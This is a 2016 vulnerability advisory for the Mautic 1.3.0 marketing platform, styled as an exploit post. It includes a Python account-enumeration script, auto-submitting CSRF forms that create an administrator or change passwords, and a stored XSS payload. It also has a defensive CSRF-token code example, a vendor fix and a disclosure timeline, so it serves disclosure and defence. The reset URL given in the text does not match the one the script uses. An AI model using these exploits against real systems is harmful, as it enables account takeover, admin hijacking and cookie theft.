
Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS

Posted on 04 April 2016

######################################################################
# Exploit Title: Mautic v1.3.0 Multiple Vulnerabilities
# Date: 01/04/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.mautic.org/
# Version: 1.3.0
# Category: Multiple Vulnerabilities
######################################################################

Mautic description :
======================================================================

Mautic is an open source marketing automation platform.

Vulnerabilities description :
======================================================================

Mautic version 1.3.0 is affected by the following vulnerabilities:

- User Enumeration
- DoS attack
- CSRF (x3)
- Stored XSS

PoC n°1 : User Enumeration
============================================

The password reset process lets an attacker submit a large number of usernames/mail addresses and learn which of them are valid. An attacker can therefore build a list of valid accounts on the Mautic installation and then run a brute-force attack against those accounts.

PoC :

[URL]
http://MauticServer/s/passwordcheck

[POSTDATA]
passwordreset[identifier]=user&passwordreset[submit]=&passwordreset[_token]=pOiK8nnVsPHkYO2pjJx9iz1jrioXOi0Q7GAdxgEk6jU

When a username/mail is valid, the server responds:

"A new password has been generated and will be emailed to you. If you do not receive it within a few minutes, check your spam box and/or contact the system administrator."

When a username/mail isn't valid, the server responds:

"No user could be identified with the given value."

This vulnerability can be exploited with the following Python script:

    import re
    import sys
    import requests

    IPServ = "http://10.2.0.109"

    if len(sys.argv) > 1:
        inputFile = sys.argv[1]
    else:
        print("[*] Usage : python " + sys.argv[0] + " <user file>")
        exit(0)

    URL1 = IPServ + '/passwordreset'   # form page, carries the _token
    URL2 = IPServ + '/passwordreset'   # form target

    with open(inputFile) as f:
        for username in f:
            username = username.strip()
            print("[?] Test if " + username + " exists...")
            session = requests.Session()
            r1 = session.get(URL1)
            # pick up the anti-CSRF token embedded in the reset form
            token = re.search(r'token\].*?value="([^"]*)"', r1.text, re.IGNORECASE)
            data = {"passwordreset[identifier]": username,
                    "passwordreset[submit]": "",
                    "passwordreset[_token]": token.group(1)}
            r2 = session.post(URL2, data=data)
            # the error message is only returned for unknown identifiers
            if r2.text.find("No user could be identified with the given value") == -1:
                print("[+] the user [" + username + "] exists !")
            else:
                print("[-] Nope ...")

So an attacker can exploit this difference in responses to enumerate users.

PoC n°2 : partial DoS - reset user password
============================================

The password reset process can be used to mount a partial DoS attack. This is a logic flaw: the reset process is not correctly implemented. For a valid username/mail submitted to the reset form, the password is immediately reset to a random one sent by mail. A proper implementation would first ask for mail validation and only change the password once the user has confirmed.

This logic flaw lets an attacker reset every password on the Mautic installation, which degrades the user experience (especially if the attacker runs the attack continuously): help-desk saturation, service interruption for users, etc.

This vulnerability can be exploited at scale with the Python script above, or manually against a single targeted account. Note that all valid usernames/mails can be found through the "User Enumeration" vulnerability described above.
PoC n°3 : CSRF on user/admin creation
============================================

The user creation process is not protected against CSRF. An attacker can force an administrator to create a new user and/or a new administrator using basic social engineering techniques: the victim only has to visit a page controlled by the attacker, which makes the victim's browser send the correct request.

PoC :

[URL]
http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57

[POSTDATA]
user[firstName]=AZEAA&user[lastName]=AAA&user[role]=1&user[position]=&user[signature]=Best+regards,+|FROM_NAME|&user[username]=AZEAZEAAA&user[email]=azeaze@azeaaze.fr&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[timezone]=&user[locale]=&user[isPublished]=1&user[buttons][apply]=

The following HTML file contains an auto-submit form that sends the targeted Mautic the correct URL and parameters to create a new user:

    <html><body>
    <form method=POST action='http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57'>
    <input type=hidden name='user[firstName]' value='userpp'>
    <input type=hidden name='user[lastName]' value='userpp'>
    <input type=hidden name='user[role]' value='1'>
    <input type=hidden name='user[position]' value=''>
    <input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
    <input type=hidden name='user[username]' value='userpp'>
    <input type=hidden name='user[email]' value='userpp@userpp.fr'>
    <input type=hidden name='user[plainPassword][password]' value='321321'>
    <input type=hidden name='user[plainPassword][confirm]' value='321321'>
    <input type=hidden name='user[timezone]' value=''>
    <input type=hidden name='user[locale]' value=''>
    <input type=hidden name='user[isPublished]' value='1'>
    <input type=hidden name='user[buttons][apply]' value=''>
    <input style="display:none" type=submit>
    </form>
    <script>document.forms[0].submit();</script>
    </body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by making an administrator create another administrator with a pre-defined login and password.

PoC n°4 : CSRF on password change
============================================

The password change process is not protected against CSRF. An attacker can force a user or an administrator to change their password using basic social engineering techniques: the victim only has to visit a page controlled by the attacker, which makes the victim's browser send the correct request.

PoC :

[URL]
http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48

[POSTDATA]
user[username]=user&user[firstName]=UserName&user[lastName]=LastName&user[position]=&user[email]=user@example.com&user[timezone]=&user[locale]=&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[signature]=Best+regards,+|FROM_NAME|&user[unlockModel]=user.user&user[unlockId]=1&user[buttons][save]=

The following HTML file contains an auto-submit form that sends the targeted Mautic the correct URL and parameters to change the user's password:

    <html><body>
    <form method=POST action='http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48'>
    <input type=hidden name='user[username]' value='userpp'>
    <input type=hidden name='user[firstName]' value='userpp'>
    <input type=hidden name='user[lastName]' value='userpp'>
    <input type=hidden name='user[position]' value=''>
    <input type=hidden name='user[email]' value='userpp@userpp.fr'>
    <input type=hidden name='user[timezone]' value=''>
    <input type=hidden name='user[locale]' value=''>
    <input type=hidden name='user[plainPassword][password]' value='987987'>
    <input type=hidden name='user[plainPassword][confirm]' value='987987'>
    <input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'>
    <input type=hidden name='user[unlockModel]' value='user.user'>
    <input type=hidden name='user[unlockId]' value='1'>
    <input type=hidden name='user[buttons][save]' value=''>
    <input style="display:none" type=submit>
    </form>
    <script>document.forms[0].submit();</script>
    </body></html>

Through this vulnerability, an attacker can take control of the Mautic installation by forcing an administrator to change their password and then logging in with the admin account.

PoC n°5 : Stored XSS Landing Page
============================================

The landing page "Title" and "Custom Html Content" inputs are vulnerable to stored XSS. A JavaScript payload placed there executes in the browser context of any user or administrator who views the page.

PoC :

[URL]
http://MauticServer/s/pages/edit/1?mauticUserLastActive=1&mauticLastNotificationId=36 HTTP/1.1

[POSTDATA]
page[title]=Page01+<script>alert(0);</script>&page[alias]=page01Page01+<img+src="X"+/>&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page01+<script>alert(0);</script></p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[unlockModel]=page.page&page[unlockId]=1&page[buttons][apply]=

Through this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as cookies, in particular the administrator's.

PoC n°6 : CSRF Landing page creation
============================================

The landing page creation process is not protected against CSRF. An attacker can force a user or an administrator to create a new landing page using basic social engineering techniques: the victim only has to visit a page controlled by the attacker, which makes the victim's browser send the correct request.

PoC :

[URL]
http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69

[POSTDATA]
page[title]=Page02&page[template]=&page[customHtml]=<html>
<head>
<title></title>
</head>
<body>
<p>Page02</p>
</body>
</html>
&page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[buttons][apply]=

The following HTML file contains an auto-submit form that sends the targeted Mautic the correct URL and parameters to create a new landing page:

    <html><body>
    <form method=POST action='http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69'>
    <input type=hidden name='page[title]' value='Page03'>
    <input type=hidden name='page[alias]' value='page02Page02'>
    <input type=hidden name='page[template]' value=''>
    <input type=hidden name='page[customHtml]' value='<html> <head> <title></title> </head> <body> <p>Page02</p> </body> </html> '>
    <input type=hidden name='page[category]' value=''>
    <input type=hidden name='page[language]' value='en'>
    <input type=hidden name='page[translationParent]' value=''>
    <input type=hidden name='page[isPublished]' value='1'>
    <input type=hidden name='page[publishUp]' value=''>
    <input type=hidden name='page[publishDown]' value=''>
    <input type=hidden name='page[metaDescription]' value=''>
    <input type=hidden name='page[sessionId]' value='1'>
    <input type=hidden name='page[redirectType]' value=''>
    <input type=hidden name='page[redirectUrl]' value=''>
    <input type=hidden name='page[buttons][apply]' value=''>
    <input style="display:none" type=submit>
    </form>
    <script>document.forms[0].submit();</script>
    </body></html>

Note that this vulnerability can be combined with the "Stored XSS Landing page" issue to reach a privilege escalation scenario from an external position without any privilege.
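The control missing from PoC n°3, n°4 and n°6 is a synchronizer token of the kind the password reset form already carries (`passwordreset[_token]`). The following is an added example, not Mautic's code, of a per-session token bound to the form name and checked in constant time on the user creation POST, with an Origin/Referer check as a second layer. The `Session` class, the request shape and the `user[_token]` field name (modelled on the reset form's field) are assumptions.

```python
import hashlib
import hmac
import secrets


class Session(dict):
    """Hypothetical stand-in for the server-side session."""

    def csrf_secret(self):
        # one random secret per session, created on first use
        return self.setdefault("_csrf_secret", secrets.token_bytes(32))


def csrf_token_for(session, form_name):
    """Token rendered into a form as a hidden field. Binding it to the form
    name means a token lifted from one form is useless on another."""
    return hmac.new(session.csrf_secret(), form_name.encode(),
                    hashlib.sha256).hexdigest()


def csrf_valid(session, form_name, submitted):
    if not submitted:
        return False
    expected = csrf_token_for(session, form_name)
    # constant-time compare, so a wrong token leaks no prefix information
    return hmac.compare_digest(expected.encode(), submitted.encode())


def same_origin(headers, site_origin):
    """Defence in depth: browsers attach Origin (or at least Referer) to
    cross-site POSTs. With neither header present the token check decides."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return True
    return source == site_origin or source.startswith(site_origin + "/")


def handle_user_new(session, form, headers, site_origin="http://MauticServer"):
    """Handler for the user creation POST (/s/users/new in the advisory).
    Both checks run before any state changes; a page served from another
    origin cannot read the victim's token, so its auto-submitted form fails."""
    if not same_origin(headers, site_origin):
        return 403, "cross-origin request refused"
    if not csrf_valid(session, "user", form.get("user[_token]")):
        return 403, "missing or invalid CSRF token"
    return 200, "user %s created" % form["user[username]"]
```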
Solution:
======================================================================

Update your Mautic installation to a newer version (version 1.3.1 can be found here: https://github.com/mautic/mautic/releases/tag/1.3.1).

Additional resources :
======================================================================

- https://youtu.be/TOZOwOYqZ34

Report timeline :
======================================================================

2016-03-16 : Vendor informed of the vulnerabilities
2016-03-19 : Vendor fixed the vulnerabilities and released a new version
2016-04-01 : Advisory released

Credits :
======================================================================

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS CONTACT: www.synetis.com | www.information-security.fr